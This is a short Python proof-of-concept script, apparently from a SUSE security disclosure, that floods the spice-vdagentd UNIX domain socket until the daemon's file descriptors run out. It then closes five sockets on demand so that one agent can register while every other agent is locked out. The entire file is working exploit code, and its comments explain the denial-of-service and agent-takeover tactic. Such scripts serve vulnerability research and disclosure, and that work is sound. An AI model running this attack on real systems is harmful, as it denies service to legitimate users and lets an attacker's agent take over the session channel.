#!/usr/bin/python3 -u
# -*- coding: utf-8 -*-
# vim: ts=4 et sw=4 sts=4 :

# Author: Matthias Gerstner <matthias.gerstner@suse.com>
#
# Utility to exhaust file descriptors in spice-vdagentd via UNIX domain socket
# connections.
#
# All of this source code is licensed under:
#
# ISC License
#
# Copyright (c) 2020, SUSE LLC
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import os, sys, socket, select

socks = []

while True:
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
    s.connect( "/run/spice-vdagentd/spice-vdagent-sock" )

    # spice-vdagentd sends out an initial message for each connected socket.
    # Once we don't get this message in time we can assume that the connection
    # only happened on kernel level, but spice-vdagentd can't accept any
    # further connections.
    readable, _, _ = select.select([s], [], [], 1)

    if readable:
        socks.append(s)
    else:
        s.close()
        # closing only a single socket doesn't allow for a successful
        # follow-up agent registration, because vdagentd needs more file
        # descriptors for checking the session, openening the virtio serial
        # device etc.
        #
        # it looks like closing five descriptors is suitable for registering
        # an agent while DoSing any other agents that want to connect.
        CLOSE_COUNT=5
        print("Established", len(socks), "active connections to vdagentd.")
        print("Waiting for Ctrl-C. Or press ENTER to close {} sockets.".format(CLOSE_COUNT))
        while True:
            dummy = sys.stdin.readline()
            for i in range(CLOSE_COUNT):
                socks.pop().close()
            print("Closed", CLOSE_COUNT, "sockets")

